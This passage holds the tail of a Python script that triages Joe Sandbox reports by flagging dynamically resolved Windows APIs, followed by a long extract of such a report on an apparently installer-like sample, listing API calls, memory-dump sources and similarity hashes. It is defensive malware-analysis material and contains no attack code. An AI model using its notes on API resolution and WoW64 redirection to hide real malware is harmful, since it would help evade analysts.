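    "Wow64DisableWow64FsRedirection": "32-bit process reaches the native System32",
    "Wow64RevertWow64FsRedirection": "restores WoW64 file-system redirection",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str
    caller: str = ""   # subcall function address; empty for top-level lines


def classify_arg(arg: str) -> str:
    """Rough type of one stack argument as Joe Sandbox prints it."""
    if arg == "?":
        return "unknown"
    if HEX_RE.match(arg):
        return "hex"             # pointer, handle or immediate
    if arg.lower().endswith(".dll"):
        return "module"
    if IDENT_RE.match(arg):
        return "identifier"      # an export-name string visible on the stack
    return "string"              # paths, registry keys and similar


def parse_api_calls(text: str) -> list:
    """Return an ApiCall for every line that matches the report's call format."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue             # "Strings", "Memory Dump Source", ... are not call lines
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref").upper(), (m.group("caller") or "").upper()))
    return calls


def dynamic_imports(calls) -> dict:
    """Group resolver calls by function and collect the modules and export names they reference.

    The report prints whatever is on the stack, so the export name often appears in
    GetModuleHandleA's argument list rather than in GetProcAddress's; scanning every
    argument of every resolver call in the same function recovers it either way.
    """
    by_func = defaultdict(lambda: {"modules": set(), "apis": set()})
    for c in calls:
        if c.api not in RESOLVERS:
            continue
        key = c.caller or c.ref  # top-level lines have no caller; key them by call site
        for a in c.args:
            kind = classify_arg(a)
            if kind == "module":
                by_func[key]["modules"].add(a.lower())
            elif kind == "identifier":
                by_func[key]["apis"].add(a)
    return dict(by_func)


def triage(imports: dict) -> list:
    """Return (function, export, note) for every flagged export, sorted for stable output."""
    hits = []
    for func, info in imports.items():
        for api in info["apis"]:
            if api in TRIAGE_NOTES:
                hits.append((func, api, TRIAGE_NOTES[api]))
    return sorted(hits)


if __name__ == "__main__":
    for func, api, note in triage(dynamic_imports(parse_api_calls(SAMPLE))):
        print(f"{func}: {api} ({note})")
```

Run it on the text of a whole report to get one line per function that touches a flagged export; keying top-level lines by their ref address keeps calls made directly from the listed function separate from those made in its subcalls.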
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID: $=H
                                                                                            • API String ID: 3660427363-3538597426
                                                                                            • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                            • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                            • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                            • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: .tmp
                                                                                            • API String ID: 1375471231-2986845003
                                                                                            • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                            • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                            • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                            • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                            APIs
                                                                                              • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                              • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                              • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                              • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                              • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                              • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                            • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                            • API String ID: 3869789854-2936008475
                                                                                            • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                            • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                            • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                            • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                            APIs
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                                                            • API String ID: 3535843008-1113070880
                                                                                            • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                            • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                            • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                            • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                            • String ID: CreateFile
                                                                                            • API String ID: 2528220319-823142352
                                                                                            • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                            • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                            • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                            • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                            • API String ID: 71445658-2565060666
                                                                                            • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                            • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                            • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                            • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                            APIs
                                                                                              • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                            • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                            • API String ID: 2906209438-2320870614
                                                                                            • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                            • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                            • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                            • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                            APIs
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorLibraryLoadModeProc
                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                            • API String ID: 2492108670-2683653824
                                                                                            • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                            • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                            • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                            • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                            APIs
                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID:
                                                                                            • API String ID: 2574300362-0
                                                                                            • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                            • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                            • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                            • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                            APIs
                                                                                            • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Append$System
                                                                                            • String ID:
                                                                                            • API String ID: 1489644407-0
                                                                                            • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                            • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                            • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                            • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                            APIs
                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                            • TranslateMessage.USER32(?), ref: 0042448F
                                                                                            • DispatchMessageA.USER32(?), ref: 00424499
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$DispatchPeekTranslate
                                                                                            • String ID:
                                                                                            • API String ID: 4217535847-0
                                                                                            • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                            • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                            • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                            • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                            APIs
                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Prop$Window
                                                                                            • String ID:
                                                                                            • API String ID: 3363284559-0
                                                                                            • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                            • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                            • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                            • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                            • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                            • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$EnableEnabledVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3234591441-0
                                                                                            • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                            • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                            • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                            • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow
                                                                                            • String ID: PrepareToInstall
                                                                                            • API String ID: 2558294473-1101760603
                                                                                            • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                            • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                            • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                            • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: /:*?"<>|
                                                                                            • API String ID: 0-4078764451
                                                                                            • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                            • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                            • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                            • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?), ref: 00482676
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
